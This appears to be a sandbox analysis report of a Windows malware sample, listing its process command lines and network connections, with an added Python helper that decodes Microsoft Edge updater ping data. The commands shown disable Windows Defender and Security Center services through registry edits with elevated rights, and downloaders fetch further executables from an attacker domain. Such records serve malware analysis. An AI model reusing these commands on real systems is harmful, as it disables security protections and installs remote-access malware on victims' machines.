"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Get-MpPreference"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=0- 4253"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090g64825090==992217=992217;1" "992217;mdf7r;992217;1688946376091796500;1688946376091796500" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\64825090"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 692

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe" "http://www.winfreycmh.Pw/Qzgfh.exe" "992217;tq5bw;1688946376091796500" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=-exe-0" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=hfhtvuhuhfhtvuhu" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe" "mygyc.exe" "http://www.winfreycmh.Pw"

C:\Users\Admin\AppData\Local\Temp\nsk4E85.tmp\MicrosoftEdgeWebview2Setup.exe

"C:\Users\Admin\AppData\Local\Temp\nsk4E85.tmp\MicrosoftEdgeWebview2Setup.exe" /silent /install

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=hfhtvuhuhfhtvuhuhfhtvuhu4" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"

C:\Program Files (x86)\Microsoft\Temp\EU4F01.tmp\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\Temp\EU4F01.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7N0M0QkEwOTctMEMyMi00RUI3LUI5NTYtQ0UwRDc3QzFBMThBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntBMjQ1OUYwMS1CNTUwLTQyNzEtOEI2OS00MzQyQzExMTMwN0Z9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iNCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTc1LjI3IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1OTI4MjE5NTY2IiBpbnN0YWxsX3RpbWVfbXM9IjEyNDciLz48L2FwcD48L3JlcXVlc3Q-

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{7C4BA097-0C22-4EB7-B956-CE0D77C1A18A}" /silent

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7N0M0QkEwOTctMEMyMi00RUI3LUI5NTYtQ0UwRDc3QzFBMThBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGNjdFNTU5Qi02RDRCLTQzQjUtQjQ1Qi04NTQ3NTkwMkIxMTl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iNCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMDYuMC41MjQ5LjExOSIgbmV4dHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTkzMzYwOTgxNyIvPjwvYXBwPjwvcmVxdWVzdD4

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\EDGEMITMP_3D23D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\EDGEMITMP_3D23D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
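The MicrosoftEdgeUpdate.exe lines above (/regserver, the COM register shell, /ping, /handoff, /svc, then the Edge installer with --msedgewebview) are the stock Omaha update sequence that installs the WebView2 runtime; the one part that looks opaque is the base64 argument to /ping. Omaha encodes its XML event report with the URL-safe base64 alphabet and strips the padding, so a plain base64 decoder rejects it and an analyst skimming the process list can mistake it for a beacon. The helper below is added here as an example and is not part of the sandbox report: it decodes such an argument and pulls out the fields worth a look (the sessionid in the decoded request is the same GUID passed as /sessionid on the /handoff line). Only the first 104 characters of the report's own argument are embedded, because the recorded blob on the first /ping line ends in a stray "-" and may have been truncated in extraction; the full-parse sample is a constructed request with placeholder GUIDs.

```python
"""Decode the base64 argument MicrosoftEdgeUpdate.exe passes to /ping so the
analyst can read the Omaha request instead of treating it as an opaque blob."""
import base64
import xml.etree.ElementTree as ET

# First 104 characters of the /ping argument from the first /ping command
# line above. 104 is a multiple of 4, so the prefix decodes on its own.
PING_PREFIX = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90"
    "b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIg"
)

# Constructed request in the same shape as the report's (not copied from the
# page; GUIDs are placeholders) so the full parse can be shown end to end.
SAMPLE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<request protocol="3.0" updater="Omaha" updaterversion="1.3.175.27" '
    'ismachine="1" sessionid="{00000000-0000-0000-0000-000000000000}" '
    'installsource="otherinstallcmd">'
    '<os platform="win" version="10.0.15063.0" arch="x64"/>'
    '<app appid="{11111111-1111-1111-1111-111111111111}" nextversion="1.3.175.27">'
    '<event eventtype="2" eventresult="1" errorcode="0"/>'
    '</app></request>'
)
SAMPLE_ARG = base64.urlsafe_b64encode(SAMPLE_XML.encode()).decode().rstrip("=")


def decode_omaha_arg(arg: str) -> str:
    """Omaha uses the URL-safe alphabet ('-' and '_' for '+' and '/') and drops
    the '=' padding, which is why the raw argument fails in a plain decoder."""
    padded = arg + "=" * (-len(arg) % 4)
    return base64.urlsafe_b64decode(padded).decode("utf-8")


def summarize_ping(arg: str) -> dict:
    """Pull out the fields worth checking: which updater sent it, the session
    it belongs to (matches /sessionid on the /handoff line) and the app/event
    pairs it reports. Raises if the payload is not an Omaha request."""
    root = ET.fromstring(decode_omaha_arg(arg).encode("utf-8"))
    if root.tag != "request":
        raise ValueError("not an Omaha request: root is <%s>" % root.tag)
    return {
        "updater": root.get("updater"),
        "updaterversion": root.get("updaterversion"),
        "sessionid": root.get("sessionid"),
        "installsource": root.get("installsource"),
        "apps": [
            {"appid": app.get("appid"),
             "events": [(e.get("eventtype"), e.get("eventresult"), e.get("errorcode"))
                        for e in app.findall("event")]}
            for app in root.findall("app")
        ],
    }
```

Paste the argument of the second /ping line, which ends in a complete base64 tail, into summarize_ping to read the report's own request; eventtype/eventresult pairs are Omaha's install and update-check outcomes, not sample-controlled data.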

Network

Country Destination Domain Proto
US 8.8.8.8:53 yearcoal.online udp
US 172.67.220.175:80 yearcoal.online tcp
US 8.8.8.8:53 geesemonth.xyz udp
US 172.67.149.68:80 geesemonth.xyz tcp
US 8.8.8.8:53 175.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 68.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.cobaltshoesx.com udp
US 149.102.225.29:443 www.cobaltshoesx.com tcp
US 8.8.8.8:53 29.225.102.149.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 koppertrain.top udp
DE 45.15.157.190:1203 koppertrain.top tcp
US 8.8.8.8:53 str.skymiddle.host udp
US 188.114.96.0:80 str.skymiddle.host tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 act.reactionharbor.xyz udp
US 188.114.96.0:80 act.reactionharbor.xyz tcp
US 8.8.8.8:53 190.157.15.45.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 8.8.8.8:53 www.mildstat.com udp
GB 23.106.59.52:80 www.mildstat.com tcp
US 8.8.8.8:53 www.mminnn.com udp
GB 23.106.59.45:80 www.mminnn.com tcp
US 8.8.8.8:53 52.59.106.23.in-addr.arpa udp
US 8.8.8.8:53 45.59.106.23.in-addr.arpa udp
US 8.8.8.8:53 axsboe-campaign.com udp
US 172.67.213.153:443 axsboe-campaign.com tcp
US 172.67.213.153:443 axsboe-campaign.com tcp
US 8.8.8.8:53 153.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
NL 95.101.74.134:443 www.bing.com tcp
NL 95.101.74.134:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
NL 95.101.74.134:443 r.bing.com tcp
NL 95.101.74.134:443 r.bing.com tcp
US 8.8.8.8:53 134.74.101.95.in-addr.arpa udp
NL 95.101.74.134:443 r.bing.com tcp
NL 95.101.74.134:443 r.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.76:443 login.microsoftonline.com tcp
NL 40.126.32.76:443 login.microsoftonline.com tcp
US 204.79.197.200:443 www2.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
DE 88.221.169.152:443 www.microsoft.com tcp
DE 88.221.169.152:443 www.microsoft.com tcp
US 8.8.8.8:53 152.169.221.88.in-addr.arpa udp
US 8.8.8.8:53 200.81.21.72.in-addr.arpa udp
